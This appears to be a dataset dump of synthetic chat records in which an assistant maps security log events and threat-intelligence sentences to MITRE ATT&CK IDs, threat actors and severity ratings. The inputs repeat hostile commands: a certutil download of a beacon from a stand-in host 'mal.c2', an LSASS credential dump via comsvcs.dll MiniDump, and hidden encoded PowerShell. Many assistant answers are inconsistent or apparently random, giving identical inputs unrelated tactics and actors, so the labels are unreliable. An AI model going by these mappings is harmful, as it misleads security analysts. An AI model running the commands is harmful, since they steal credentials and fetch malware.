messages
listlengths
2
2
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.70.243.209", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Olympic Destroyer attempts to copy itself to remote machines on the network.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1570\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"con...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-BP9C9232GG)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Collection, Execution", "role": "user" }, { "content": "{\"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 622 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.131.61.27", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0007\"], \"techniques\": [\"T...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-Z565TRC8LU)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Exfiltration, Defense Evasion", "role": "user" }, { "content"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.190.47.149", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniqu...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3211 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.128.124.62", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0043\"], \"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-P23TSFOPR8)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severity\": \"High\",...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"c...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.156.99.54", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0040\", \"TA0003\"],...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Turla has used the VPS infrastructure of compromised Iranian threat actors.", "role": "user" }, { "content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1584.003\", \"T1584\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-9HLNYENQHV)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Reconnaissance, Collection", "role": "user" }, ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2740 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.92.48.204", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0009\", \"TA0043\"], ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-O4AEQUSHU3)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Impact, Persistence, Exfiltration", "role": "user" }, { "content": "...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Base64, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"con...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, WMI, Base64", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2156 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\": ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1610 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1467 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.115.86.156", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0006\", \"TA0001\"], \"te...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: SDBbot has the ability to use the command shell to execute commands on a compromised host.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}", "role":...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: P8RAT can download additional payloads to a target system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.116.86.59", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0004\", \"TA0007\"], \"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2041 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.33.71.206", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1059.001...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"co...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.182.109.68", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"tec...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-DCNMAVZF2T)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion, Exfiltration, Impact", "role": "user" }, { "con...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump PID lsass.dmp full", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1003\", \"T1003.001\"]}", "role": "assist...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: For example, adversaries can use a mDNS query (such as dns-sd -B _ssh._tcp .)", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1046\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.75.132.213", "role": "user" }, { "content": "{\"tactics\": ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Explosive has encrypted communications with the RC4 method.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.001\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-LOOUZ79MQ4)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Defense Evasion, Exfiltration, Persistence", "role": "user" }, { "conte...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-EE2JN3068N)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement, Reconnaissance, Exfiltration", "role": "user" }...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-S0756JEEXD)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Initial Access, Credential Access", "role": "user" }, { "content"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Fileless, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"confide...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries may also leverage a Network Device CLI on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes.", "role": "u...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"con...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: CaddyWiper can enumerate all files and directories on a compromised host.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Base64, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\": \"High\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.189.58.243", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"], \"tec...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-J336LMXZXU)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": \"Crit...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.130.209.16", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techni...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 823 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.96.222.205", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0010\"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.", "role": "user" }, { "content": "{\"tactics\": [\"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1971 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.127.95.102", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0004\"], \"techniques\": ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.123.160.39", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0002\"], \"techniques\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, Base64, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Mustang Pan...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-XSU3T9MCAF)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severity\": \"Hi...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.92.26.227", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0002\", \"TA0009\...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 955 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.164.179.16", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1021.006\...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.85.97.52", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0006\"],...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.189.218.254", "role": "user" }, { "content": "{\"tactics\": [...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: JHUHUGIT has a command to download files to the victim’s machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-EP1RW91EMC)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Credential Access, Execution, Exfiltration", "role": "user" }, { "conte...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", \"confidenc...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3468 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.131.54.238", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0002\"], \"techniques\...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.138.4.14", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0002\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-OO2CEK72BI)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Persistence, Reconnaissance, Credential Access", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-5DRNLOW7MB)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Execution", "role": "user" }, { "content": "{\"severity\"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.19.149.84", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0010\", \"TA0040\"], \"technique...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: The plugin uses the same network protocol as PLAINTEE and so we were able to trivially decode further commands that were sent.  The following commands were observed: tasklist ipconfig /all The attacker performed these tw...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 934 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.141.223.184", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0009\...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Bazar can also check if the Russian language is installed on the infected machine and terminate if it is found.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}", "...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-WAE0CKK9GP)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation", "role": "user" }, { "content":...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.185.157.25", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0004\", \"TA00...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.163.88.195", "role": "user" }, { "content": "{\"tactics\": [\"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Ecipekac can use XOR, AES, and DES to encrypt loader shellcode.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Ensure proper Registry permissions are in place to prevent adversaries from disabling or interfering with security services.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1562.001\", \"T1...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.132.119.117", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"tech...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Using rundll32.exe, vice executing directly ( Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations.", "role"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: /var/log/kern.log: Kernel logs", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.002\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.146.81.182", "role": "user" }, { "content": "{\"tactics\": [\"TA...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 578 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.160.112.103", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1021.00...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.33.199.233", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0008\", \"TA0003\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1026 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", \"con...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: After the cookie is obtained through Steal Web Session Cookie or Web Cookies, the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\",...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 2494 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.85.221.18", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.178.114.177", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0001\", \"TA0040\"], \"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-1L4L0XE24W)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation", "role": "user" }, { "content": ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 713 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidence\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: JA3 Spoof, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confi...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor for commands with arguments (such as opening common command-line editors) used to modify plist files, especially commonly abused files such as those in \\~/LaunchAgents, \\~/Library/Application Support/com.ap...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.132.119.5", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0009\", \"TA0004\"],...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: HKCU\\Software\\Microsoft\\Office test\\Special\\Perf", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1137\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.113.82.96", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T156...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Rover copies files from removable drives to C:\\system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1074.001\", \"T1074\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-TC7EU1XQ4W)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Initial Access", "role": "user" }, { "content": "{\"s...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Service paths and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (, C:\\unsafe path with space\\program.exe vs. \"C:\\safe path with space\\progra...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2916 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\":...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Any matching files are encrypted and written to a local user directory.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1119\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Clambling can use cmd.exe for command execution.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.17.246.139", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0040\", \"TA0006\"], \...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-0QOWSB1UPQ)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Discovery, Defense Evasion", "role": "user" }, { "co...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Pan...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-UNEOB5S96I)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Collection, Initial Access, Persistence", "role": "user" }, { "content": ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.56.68.41", "role": "user" }, { "content": "{\"tactics\": [\"TA0002...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.45.255.169", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0008\"], \"techniques\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"conf...